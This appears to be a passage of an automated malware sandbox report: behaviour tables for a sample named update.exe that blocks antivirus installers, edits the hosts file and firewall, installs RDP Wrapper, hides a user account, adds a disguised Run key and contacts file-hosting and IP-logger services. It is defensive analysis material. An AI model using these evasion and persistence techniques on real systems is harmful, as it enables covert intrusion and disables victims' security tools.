| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\R8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\winit.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\install\cheat.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\R8.exe | N/A |
| N/A | N/A | C:\rdp\Rar.exe | N/A |
| N/A | N/A | C:\rdp\RDPWInst.exe | N/A |
| N/A | N/A | C:\rdp\RDPWInst.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhost.exe | N/A |
| N/A | N/A | C:\Programdata\WindowsTask\winlogon.exe | N/A |
| N/A | N/A | C:\ProgramData\WindowsTask\MicrosoftHost.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\rutserv.pdb | C:\ProgramData\Windows\rutserv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\exe\rutserv.pdb | C:\ProgramData\Windows\rutserv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\exe\rutserv.pdb | C:\ProgramData\Windows\rutserv.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhost.exe | N/A |
| File opened for modification | C:\Windows\System32\winmgmts:\localhost\ | C:\Programdata\RealtekHD\taskhost.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\360 | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\rdp\RDPWInst.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
